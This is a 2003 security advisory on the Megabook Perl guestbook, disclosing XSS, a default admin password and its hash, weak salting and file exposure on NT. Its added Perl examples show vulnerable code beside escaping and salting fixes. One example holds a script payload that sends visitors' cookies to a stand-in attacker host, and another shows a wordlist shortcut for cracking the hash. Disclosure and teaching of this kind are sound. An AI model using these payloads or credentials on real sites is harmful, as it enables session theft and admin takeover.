Message-ID: <Law11-OE13Kg4dBd8lf00015cb8@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Megabook 2.0 -XSS & UA execution

------------------------------------------------------------------
          - EXPL-A-2003-011 exploitlabs.com Advisory 011
------------------------------------------------------------------
                        -= MegaBook =-



exploitlabs.com
June 29, 2003



Vulnerabilities:
----------------
1. XSS and unchecked input length in admin.cgi
2. Default admin password (weakly hashed)
3. Stored XSS via User-Agent
4. Not secure on NT
5. Undocumented posting entry points

Product:
--------
megabook guestbook
http://www.militerry.com/megabook/

Description of product:
-----------------------
"Megabook is an online guestbook that allows users that come to your
site to leave a message. These messages can also contain their e-mail
addresses, websites." "Everyone will be able to view the messages left
by past users" ...and whatever XSS they care to leave.

From their FAQ:

"Q: Will Megabook work on Windows NT servers?
A: Megabook was only tested on UNIX-based servers.
There is a possibility that it could work but from
other people testing it seems that it won't."

Dunno who they use to test, but it works fine on NT (heck, I'll beta).

Note: this is a very popular script, easily found with Google (search
for gbook.db). All tests were run in a default state per the
installation instructions and confirmed in the wild.


VULNERABILITY / EXPLOIT
=======================

where to start...


1. XSS is executable via the login field in admin.cgi; the field is
echoed back unencoded and has no length limit, so the payload size is
unconstrained:
http://[test-url]/megabook/admin.cgi

2. The default admin password is "megabook". The setup.db shipped in
the package stores it as meJyatGfwfBXQ:
http://www.militerry.com/megabook/files/20/setup.db
That is a 13-character crypt(3)-style hash: the first two characters
are the salt, and here the salt ("me") is simply the first two
characters of the password itself. Since that holds for any password
the admin sets, the stored hash always gives away the first two
characters of the current password.

3. Stored XSS via User-Agent in gbook.db: the script records each
poster's User-Agent header in gbook.db and writes it back into the page
unencoded, so script placed in the UA string is readable in the
database and executes in the browser of everyone who views the
guestbook.

There are many more issues in this very popular script... I lost
track.
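The User-Agent and login-field issues above are one bug seen from two sides: untrusted input is stored (or echoed) and later written into HTML without encoding. The Perl below is an added example, not Megabook's code, showing the vulnerable store-and-render pattern run against a constructed poisoned request, beside a version that HTML-encodes every field at output time. The pipe-separated record layout, field names and the attacker.example host are assumptions; the page does not show gbook.db's real format.

```perl
#!/usr/bin/perl
# Added example (not Megabook's code): a guestbook that stores the raw
# User-Agent header and later prints it executes it for every viewer.
# Record layout and field names are assumptions, not gbook.db's format.
use strict;
use warnings;

# What the CGI sees on a poisoned request (constructed test input): the
# attacker simply sets his browser's User-Agent string to a script tag.
my %req = (
    name => 'visitor',
    msg  => 'nice site',
    ua   => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
);

# Vulnerable: fields are joined into the record exactly as received.
sub vulnerable_record {
    my ($r) = @_;
    return join("|", $r->{name}, $r->{msg}, $r->{ua}) . "\n";
}

# Vulnerable: the record is rendered back into HTML without encoding,
# so the stored <script> tag lands in the page as markup.
sub vulnerable_render {
    my ($line) = @_;
    chomp $line;
    my ($name, $msg, $ua) = split /\|/, $line, 3;
    return "<b>$name</b> wrote: $msg <i>($ua)</i><br>\n";
}

# Fix: HTML-encode every untrusted value at the point it is output.
# (HTML::Entities::encode_entities does the same; hand-rolled here so
# the example runs on a bare perl.)
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Same rendering, but each field passes through html_escape() first;
# the script tag now displays as text instead of running.
sub safe_render {
    my ($line) = @_;
    chomp $line;
    my ($name, $msg, $ua) = map { html_escape($_) } split /\|/, $line, 3;
    return "<b>$name</b> wrote: $msg <i>($ua)</i><br>\n";
}

my $rec = vulnerable_record(\%req);
print "Vulnerable output:\n", vulnerable_render($rec);
print "Escaped output:\n",    safe_render($rec);
```

The same encoding step fixes the reflected case in admin.cgi's login field. Escaping at output time does not, however, stop a UA containing a newline or the record delimiter from corrupting the flat file; reject or strip those at write time as well.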

4. Despite the vendor saying the script does not work on NT, it runs
fine there with Perl installed. That configuration is not desirable,
though: every file in the megabook directory becomes readable over the
web.
( gbook.db contains e-mail and IP addresses )
( setup.db contains the weakly hashed password and admin info )

5. preview.txt, missing.txt and signgbook.cgi (sic) provide posting
functionality that is not documented.

The script's only protection for setup.db is a chmod() dance around
each read, which is why the file is exposed on NT:
--------- snip of the cgi -------------
chmod(0666, "setup.db");   # world-readable AND world-writable while in use
open (SETUP, "setup.db");  # return value unchecked; if this dies the file stays 0666
@setup = <SETUP>;
close(SETUP);
chmod(0000, "setup.db");   # sole protection for the hashed password;
                           # Win32 Perl ignores the group/other bits, so
                           # the file stays readable there
-------- end snip--------------------
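On the setup.db hash, the Perl below is an added example, not Megabook's code. It shows what a crypt(3) hash whose salt is taken from the password gives away, how an auditor checks a captured setup.db entry for that pattern, and how to salt properly. That the salt is the first two characters of the password is the advisory's observation, not something confirmed against the script's source here; the stored hash is the one from the advisory, and the wordlist is constructed.

```perl
#!/usr/bin/perl
# Added example (not Megabook's code): a traditional DES crypt(3) string
# is 13 characters, salt first (2 chars) then 11 chars of hash. If the
# salt is derived from the password, the hash leaks the password prefix.
use strict;
use warnings;

# Weak: salt taken from the password itself (the pattern the advisory
# observed in setup.db; how Megabook really builds its salt is assumed).
sub weak_hash {
    my ($pw) = @_;
    return crypt($pw, substr($pw, 0, 2));
}

# Fix: a salt from a random source, independent of the password.
# rand() is not a CSPRNG, but a salt only has to be unpredictable
# enough not to repeat across installs; use a stronger source if one
# is available.
my @salt_chars = ('a'..'z', 'A'..'Z', '0'..'9', '.', '/');
sub random_salt {
    return join '', map { $salt_chars[int rand @salt_chars] } 1..2;
}
sub strong_hash {
    my ($pw) = @_;
    return crypt($pw, random_salt());
}

# Audit check: does the stored hash's salt equal the candidate's first
# two characters? For a setup.db that was generated this way, the salt
# tells you where to start guessing.
sub salt_leaks_prefix {
    my ($hash, $candidate) = @_;
    return substr($hash, 0, 2) eq substr($candidate, 0, 2);
}

# Verify a candidate against a stored crypt(3) hash; crypt() reads the
# salt from the first two characters of its second argument.
sub check_password {
    my ($hash, $candidate) = @_;
    return crypt($candidate, $hash) eq $hash;
}

my $stored = 'meJyatGfwfBXQ';   # setup.db value quoted in the advisory

printf "salt '%s' matches password prefix: %s\n", substr($stored, 0, 2),
    salt_leaks_prefix($stored, 'megabook') ? 'yes' : 'no';
printf "default password 'megabook' verifies: %s\n",
    check_password($stored, 'megabook') ? 'yes' : 'no';

# Wordlist prefilter: once the salt is known to be the password prefix,
# only candidates sharing that prefix need to go through crypt() at all.
my @wordlist = qw(password guestbook megabook admin secret megan);  # constructed
my @worth_trying = grep { salt_leaks_prefix($stored, $_) } @wordlist;
print "candidates after salt prefilter: @worth_trying\n";

# For contrast, two hashes of the same password with random salts share
# nothing with the password or with each other.
print "random-salt hash: ", strong_hash('megabook'), "\n" for 1..2;
```

crypt() here needs a libc with traditional DES crypt enabled (glibc has it; some modern libcrypt builds may reject two-character salts) and is missing from some Win32 perls, so run it on a Unix host. The prefilter is the practical cost of the leak: an attacker cracking a changed password skips two characters of the keyspace for free.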


Local:
------
not really

Remote:
-------
real bad



Vendor Fix:
-----------
None; this advisory is published as 0-day.

Vendor Contact:
---------------
megabook@...iterry.com
Notified concurrent with this advisory.


Credits:
--------
Donnie Werner
http://exploitlabs.com
http://frame4.com
